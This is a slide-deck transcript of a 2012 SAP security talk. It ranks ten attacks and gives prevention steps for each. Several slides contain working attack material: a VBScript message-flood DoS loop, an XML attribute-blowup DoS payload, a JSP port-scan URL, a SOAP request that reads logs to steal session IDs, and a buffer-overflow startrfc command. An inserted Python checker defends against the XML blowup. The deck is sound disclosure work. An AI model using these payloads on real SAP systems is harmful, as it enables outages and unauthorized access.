SAP (In)Security: New and Best

1. Invest in security to secure investments
   SAP (In)Security: New and Best
   Alexander Polyakov, CTO at ERPScan/Digital Security
   May 31, 2012

2. Me
   Business application security expert

3. Instead of Intro
   Vulnerabilities are everywhere

4. What is SAP?
   Shut up And Pay

5. Really
   • The most popular business application
   • More than 120000 customers
   • 74% of Forbes 500

6. Agenda
   • Intro
   • SAP security history
   • SAP on the Internet
   • Most popular SAP issues (OLD)
   • Top 10 latest interesting attacks (NEW)
   • DEMOs
   • Conclusion

7. 3 areas of SAP Security
   2002: Business logic security. Prevents attacks or mistakes made by insiders. Solution: GRC
   2008: ABAP Code security. Prevents attacks or mistakes made by developers. Solution: Code audit
   2010: Application platform security. Prevents unauthorized access both within the corporate network and from remote attackers. Solution?

8. Talks about SAP security
   (Chart: number of talks per year, 2006 to 2012)
   Most popular:
   • BlackHat
   • HITB
   • Troopers
   • RSA
   • Source
   • DeepSec
   • etc.

9. SAP Security notes
   (Chart: number of SAP Security notes per year, 2001 to 2012)
   By April 26, 2012, a total of 2026 notes

10. SAP vulnerabilities by type
   (Chart: count per type; stats from 1Q 2012, 1Q 2010 and 4Q 2009)
   1 - Directory Traversal
   2 - XSS/Unauthorised modification of stored content
   3 - Missing Auth check
   4 - Information Disclosure
   5 - Unauthorized usage of application functionality
   6 - Hard-coded credentials
   7 - Code injection vulnerability
   8 - Verb tampering
   9 - Remote Code Execution
   10 - Denial of service
   11 - BOF
   12 - SQL Inj

11. Top problems by OWASP-EAS (Implementation issues)
   EASAI-1 Lack of patch management
   EASAI-2 Default Passwords for application access
   EASAI-3 SOD conflicts
   EASAI-4 Unnecessary Enabled Application features
   EASAI-5 Open Remote management interfaces
   EASAI-6 Lack of password lockout/complexity checks
   EASAI-7 Insecure options
   EASAI-8 Unencrypted communications
   EASAI-9 Insecure trust relations
   EASAI-10 Guest access

12. Top problems by BIZEC
   ● BIZEC TEC-01: Vulnerable Software in Use
   ● BIZEC TEC-02: Standard Users with Default Passwords
   ● BIZEC TEC-03: Unsecured SAP Gateway
   ● BIZEC TEC-04: Unsecured SAP/Oracle authentication
   ● BIZEC TEC-05: Insecure RFC interfaces
   ● BIZEC TEC-06: Insufficient Security Audit Logging
   ● BIZEC TEC-07: Unsecured SAP Message Server
   ● BIZEC TEC-08: Dangerous SAP Web Applications
   ● BIZEC TEC-09: Unprotected Access to Administration Services
   ● BIZEC TEC-10: Insecure Network Environment
   ● BIZEC TEC-11: Unencrypted Communications

13. Business Risks
   Espionage
   • Stealing financial information
   • Stealing corporate secrets
   • Stealing suppliers and customers list
   • Stealing HR data
   Sabotage
   • Denial of service
   • Modification of financial reports
   • Access to technology network (SCADA) by trust relations
   Fraud
   • False transactions
   • Modification of master data
   • etc.

14. SAP on the Internet
   MYTH: attacks on SAP systems are available only to insiders
   • We have collected data about SAP systems on the WEB
   • Have various stats by countries, applications, versions
   • Information from Google, Shodan, Nmap scan

15. SAP on the Internet

16. SAP on the Internet
   About 5000 systems including Dispatcher, Message server, SapHostcontrol, Web services

17. Top 10 vulnerabilities 2011-2012
   1. Authentication Bypass via Verb tampering
   2. Authentication Bypass via the Invoker servlet
   3. Buffer overflow in ABAP Kernel
   4. Code execution via TH_GREP
   5. MMC read SESSIONID
   6. Remote portscan
   7. Encryption in SAPGUI
   8. BAPI XSS/SMBRELAY
   9. XML Blowup DOS
   10. GUI Scripting DOS
18. 10 – GUI-Scripting DOS: Description (New)
   • SAP users can run scripts which automate their user functions
   • A script has the same rights in SAP as the user who launched it
   • The security message which is shown to the user can be turned off in the registry
   • Almost any user can use SAP Messages (SM02 transaction)
   • It is possible to run a DOS attack on any user using a simple script
   Author: Dmitry Chastukhin (ERPScan)

19. 10 – GUI-scripting: Details
   If Not IsObject(application) Then
      Set SapGuiAuto = GetObject("SAPGUI")
      Set application = SapGuiAuto.GetScriptingEngine
   End If
   If Not IsObject(connection) Then
      Set connection = application.Children(0)
   End If
   If Not IsObject(session) Then
      Set session = connection.Children(0)
   End If
   If IsObject(WScript) Then
      WScript.ConnectObject session, "on"
      WScript.ConnectObject application, "on"
   End If
   do
   a=a+1
   session.findById("wnd[0]").maximize
   session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
   session.findById("wnd[0]/tbar[0]/btn[0]").press
   session.findById("wnd[0]/tbar[1]/btn[34]").press
   session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
   session.findById("wnd[1]").sendVKey 4
   session.findById("wnd[2]/usr/lbl[1,3]").setFocus
   session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
   session.findById("wnd[2]").sendVKey 2
   session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
   session.findById("wnd[1]/tbar[0]/btn[0]").press
   Loop Until a>=1000

20. 10 – GUI-scripting: Other attacks
   Script can be uploaded using:
   – SAPGUI ActiveX vulnerability
   – Teensy USB flash
   – Any other method of client exploitation
   Other attacks, like changing banking accounts in LFBK, are also possible

21. 10 – GUI-scripting: Business risks
   Sabotage – High
   Espionage – No
   Fraud – No
   Ease of exploitation – Medium

22. 10 – GUI-scripting: Prevention
   • SAP GUI Scripting Security Guide
   • sapgui/user_scripting = FALSE
   • Block registry modification on workstations
23. 9 – XML Blowup DOS: Description (New)
   • WEBRFC interface can be used to run RFC functions
   • By default any user can have access
   • Can execute at least RFC_PING
   • SAP NetWeaver is vulnerable to malformed XML packets
   • It is possible to run a DOS attack on the server using a simple script
   • It is possible to run it over the Internet!
   Author: Alexey Tyurin (ERPScan)

24. 9 – XML Blowup DOS: Details
   <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <SOAP-ENV:Body>
   <m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" a1="" a2="" ... a10000=""></m:RFC_PING>
   </SOAP-ENV:Body>
   </SOAP-ENV:Envelope>

25. 9 – XML Blowup DOS: Business risks
   Sabotage – Critical
   Espionage – No
   Fraud – No
   Ease of exploitation – Medium

26. 9 – XML Blowup DOS: Prevention
   • Disable WEBRFC
   • Prevent unauthorized access to WEBRFC using S_ICF
   • Install SAP notes 1543318 and 1469549
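The slides show the RFC_PING request shape and recommend disabling or restricting WEBRFC; as an added example (not from the deck or from SAP), the code below builds a request of that shape as constructed input and shows a pre-parse budget check a WEBRFC front end or reverse proxy could apply, rejecting the attribute blowup before the body reaches the SAP XML parser. The limits and function names are our own assumptions.

```python
"""Pre-parse budget check for SOAP RFC requests (added example, not from the deck).

Builds a request shaped like the slide's RFC_PING blowup (a1="" ... aN="") and shows
a streaming check that a WEBRFC front end or reverse proxy could apply before the
request reaches the SAP parser. Limits are constructed for the demo.
"""
import xml.parsers.expat

SOAP_OPEN = ('<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
             '<SOAP-ENV:Body>')
SOAP_CLOSE = '</SOAP-ENV:Body></SOAP-ENV:Envelope>'


def rfc_ping_request(attr_count):
    """Constructed RFC_PING body carrying attr_count dummy attributes, as on the slide."""
    attrs = " ".join(f'a{i}=""' for i in range(1, attr_count + 1))
    call = f'<m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" {attrs}></m:RFC_PING>'
    return (SOAP_OPEN + call + SOAP_CLOSE).encode()


class RequestRejected(Exception):
    """Raised from inside the parser callbacks so parsing stops at the first violated limit."""


def inspect_soap(body, max_bytes=64 * 1024, max_attrs=32, max_depth=16, max_elements=500):
    """Return ("ok", rfc_function) or ("rejected", reason).

    expat is event driven, so attributes, depth and element count are checked as they
    stream past; the byte cap comes first so an oversized body is never parsed at all."""
    if len(body) > max_bytes:
        return "rejected", f"body is {len(body)} bytes, limit {max_bytes}"
    state = {"depth": 0, "elements": 0, "in_body": False, "function": None}

    def start(name, attrs):
        state["depth"] += 1
        state["elements"] += 1
        if state["depth"] > max_depth:
            raise RequestRejected(f"nesting deeper than {max_depth}")
        if state["elements"] > max_elements:
            raise RequestRejected(f"more than {max_elements} elements")
        if len(attrs) > max_attrs:  # attrs includes xmlns declarations, which is intended
            raise RequestRejected(f"<{name}> carries {len(attrs)} attributes, limit {max_attrs}")
        local = name.rsplit(":", 1)[-1]
        if state["in_body"] and state["function"] is None:
            state["function"] = local  # first child of Body names the RFC function called
        if local == "Body":
            state["in_body"] = True

    def end(name):
        state["depth"] -= 1

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    try:
        parser.Parse(body, True)
    except RequestRejected as exc:
        return "rejected", str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return "rejected", f"malformed XML: {exc}"
    if state["function"] is None:
        return "rejected", "no RFC function inside Body"
    return "ok", state["function"]


if __name__ == "__main__":
    for n in (3, 200, 10000):
        print(n, "attributes ->", inspect_soap(rfc_ping_request(n)))
```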
27. 8 – BAPI script injection/hash stealing: Description
   • SAP BAPI transaction fails to properly sanitize input
   • Possible to inject JavaScript code or a link to a fake SMB server
   • SAP GUI clients use Windows, so their credentials will be transferred to the attacker's host
   Author: Dmitry Chastukhin (ERPScan)

28. 8 – BAPI script injection/hash stealing: Demo (New)

29. 8 – BAPI script injection/hash stealing: Business risks
   Espionage – High
   Sabotage – High
   Fraud – High
   Ease of exploitation – Low
30. 7 – SAP GUI bad encryption: Description (New)
   • SAP FrontEnd can save encrypted passwords in shortcuts
   • Shortcuts are stored in a .sap file
   • This password uses a byte-XOR algorithm with a "secret" key
   • The key has the same value for every installation of SAP GUI
   • Any password can be decrypted in 1 second
   Author: Alexey Sintsov (ERPScan)

31. 7 – SAP GUI bad encryption: Demo

32. 7 – SAP GUI bad encryption: Business risks
   Espionage – High
   Sabotage – Medium
   Fraud – High
   Ease of exploitation – Medium

33. 7 – SAP GUI bad encryption: Prevention
   • Disable password storage in GUI
34. 6 – Remote port scan via JSP: Description
   • It is possible to scan the internal network from the Internet
   • Authentication is not required
   • SAP NetWeaver J2EE engine is vulnerable
   /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&
      port=31337&
      password=&
      dispatcher=&
      targetClient=&
      view=
   Author: Alexander Polyakov (ERPScan)

35. 6 – Remote port scan via JSP: Demo
   (Screenshot captions: Host is not alive; HTTP port; Port closed; SAP port)

36. 6 – Remote port scan via JSP: Business risks
   Sabotage – Low
   Espionage – Medium
   Fraud – No
   Ease of exploitation – High

37. 6 – Remote port scan via JSP: Prevention
   • Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883
   • Disable unnecessary applications
38. 5 – MMC JSESSIONID stealing: Description (New)
   • Remote management of SAP Platform
   • By default, many commands go without auth
   • Exploits implemented in Metasploit (by ChrisJohnRiley)
   • Most of the bugs are information disclosure
   • It is possible to find information about JSESSIONID
   • Only if trace is ON
   • Can be authenticated as an existing user remotely
   1) Original bug by ChrisJohnRiley
   2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan)

39. 5 – MMC SESSIONID stealing: Details
   <?xml version="1.0" encoding="UTF-8" ?>
   <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xs="http://www.w3.org/2001/XMLSchema">
     <SOAP-ENV:Header>
       <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
         <enableSession>true</enableSession>
       </sapsess:Session>
     </SOAP-ENV:Header>
     <SOAP-ENV:Body>
       <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
         <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
         <filter></filter>
         <language></language>
         <maxentries>100</maxentries>
         <statecookie>EOF</statecookie>
       </ns1:ReadLogFile>
     </SOAP-ENV:Body>
   </SOAP-ENV:Envelope>

40. 5 – MMC JSESSIONID stealing: Business risks
   Espionage – Critical
   Fraud – High
   Sabotage – Medium
   Ease of exploitation – Medium

41. 5 – MMC JSESSIONID stealing: Prevention
   • The JSESSIONID by default will not be logged in the log file
   • Don't use TRACE_LEVEL = 3 on production systems, or delete traces after use
   • Other info: http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
42. 4 – Remote command execution in TH_GREP: Description
   • RCE vulnerability in RFC module TH_GREP
   • Found by Joris van de Vis
   • SAP was not properly patched (1433101)
   • We have discovered that the patch can be bypassed in Windows
   Original bug by Joris van de Vis (erp-sec)
   Bypass by Alexey Tyurin (ERPScan)

43. 4 – RCE in TH_GREP: Details
   elseif opsys = Windows NT.
     concatenate /c:" string " filename into grep_params in character mode.
   else. /*if linux*/
     /* 185 */ replace all occurrences of in local_string with "".
     /* 186 */ concatenate local_string filename into grep_params
     /* 187 */   in character mode.
     /* 188 */ endif.

44. 4 – RCE in TH_GREP: Demo #1

45. 4 – RCE in TH_GREP: More details
   4 ways to execute the vulnerable program:
   • Using transaction SE37
   • Using transaction SM51 (thanks to Felix Granados)
   • Using remote RFC call TH_GREP
   • Using SOAP RFC call TH_GREP via web

46. 4 – RCE in TH_GREP: Demo #2

47. 4 – RCE in TH_GREP: Business risks
   Espionage – High
   Sabotage – Medium
   Fraud – High
   Ease of exploitation – Medium

48. 4 – RCE in TH_GREP: Prevention
   • Install SAP notes 1580017, 1433101
   • Prevent access to critical transactions and RFC functions
   • Check the ABAP code of your Z-transactions for similar vulnerabilities
49. 3 – ABAP Kernel BOF: Description
   • Presented by Andreas Wiegenstein at BlackHat EU 2011
   • Buffer overflow in SAP kernel function C_SAPGPARAM
   • When the NAME field is more than 108 chars
   • Can be exploited by calling an FM which uses C_SAPGPARAM
   • Example of report: RSPO_R_SAPGPARAM
   Author: (VirtualForge)

50. 3 – ABAP Kernel BOF: Details
   > startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 -u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E
       NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAA -t 4

   RFC Call/Exception: SYSTEM_FAILURE
   Group    Error group 104
   Key      RFC_ERROR_SYSTEM_FAILURE
   Message  connection closed without message (CM_NO_DATA_RECEIVED)

51. 3 – ABAP Kernel BOF: Business risks
   Espionage – Critical
   Sabotage – Critical
   Fraud – Critical
   Ease of exploitation – Medium

52. 3 – ABAP Kernel BOF: Prevention
   • Install SAP notes:
     - 1493516 – Correcting buffer overflow in ABAP system call
     - 1487330 – Potential remote code execution in SAP Kernel
   • Prevent access to critical transactions and RFC functions
   • Check the ABAP code of your Z-transactions for critical calls
53. 2 – Invoker Servlet: Description
   • Rapidly calls servlets by their class name
   • Published by SAP in their security guides
   • Possible to call any servlet from the application
   • Even if it is not declared in WEB.XML
   Can be used for auth bypass

54. 2 – Invoker Servlet: Details
   <servlet>
     <servlet-name>CriticalAction</servlet-name>
     <servlet-class>com.sap.admin.Critical.Action</servlet-class>
   </servlet>
   <servlet-mapping>
     <servlet-name>CriticalAction</servlet-name>
     <url-pattern>/admin/critical</url-pattern>
   </servlet-mapping>
   <security-constraint>
     <web-resource-collection>
       <web-resource-name>Restrictedaccess</web-resource-name>
       <url-pattern>/admin/*</url-pattern>
       <http-method>GET</http-method>
     </web-resource-collection>
     <auth-constraint>
       <role-name>admin</role-name>
     </auth-constraint>
   </security-constraint>
   What if we call /servlet/com.sap.admin.Critical.Action?
   Author: Dmitry Chastukhin (ERPScan)

55. 2 – Invoker servlet: Business risks
   Espionage – High
   Sabotage – High
   Fraud – High
   Ease of use – Very easy!

56. 2 – Invoker servlet: Prevention
   • Update to the latest patch: 1467771, 1445998
   • The "EnableInvokerServletGlobally" property of the servlet_jsp must be "false"
   If you can't install patches for some reason, you can check all WEB.XML files using the ERPScan web.xml scanner or manually.
57. 1 – VERB Tampering

58. 1st Place – Verb Tampering
   <security-constraint>
     <web-resource-collection>
       <web-resource-name>Restrictedaccess</web-resource-name>
       <url-pattern>/admin/*</url-pattern>
       <http-method>GET</http-method>
     </web-resource-collection>
     <auth-constraint>
       <role-name>admin</role-name>
     </auth-constraint>
   </security-constraint>
   What if we use HEAD instead of GET?
   Author: Alexander Polyakov (ERPScan)

59. 1st Place – Verb tampering: Details
   • CTC – Secret interface for managing J2EE engine
   • Can be accessed remotely
   • Can run user management actions:
     – Add users
     – Add to groups
     – Run OS commands
     – Start/Stop J2EE
   Remotely, without authentication!

60. 1 – Verb tampering: Demo

61. 1 – Verb tampering: More details
   If patched, it can be bypassed by the Invoker servlet!

62. 1 – Verb tampering: Business risks
   Espionage – Critical
   Sabotage – Critical
   Fraud – Critical
   Ease of use – Very easy!

63. 1st Place – Verb tampering: Prevention
   • Install SAP notes 1503579, 1616259
   • Install other SAP notes about Verb Tampering (about 18)
   • Scan applications using the ERPScan WEB.XML check tool or manually
   • Secure WEB.XML by deleting all <http-method>
   • Disable the applications that are not necessary
64. Conclusion
   It is possible to be protected from almost all those kinds of issues, and we are working hard with SAP to make it secure:
   • SAP Guides
   • Regular Security assessments
   • Monitoring technical security
   • ABAP Code review
   • Segregation of Duties
   It's all in your hands

65. Future work
   Many of the researched things cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations:
   • Just4Meeting in July (Portugal)
   • BlackHat USA in July (Las Vegas)

66. Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.

67. web: www.dsec.ru, www.erpscan.com
   e-mail: info@erpscan.com, sales@erpscan.com
   Twitter: @erpscan, @sh2kerr
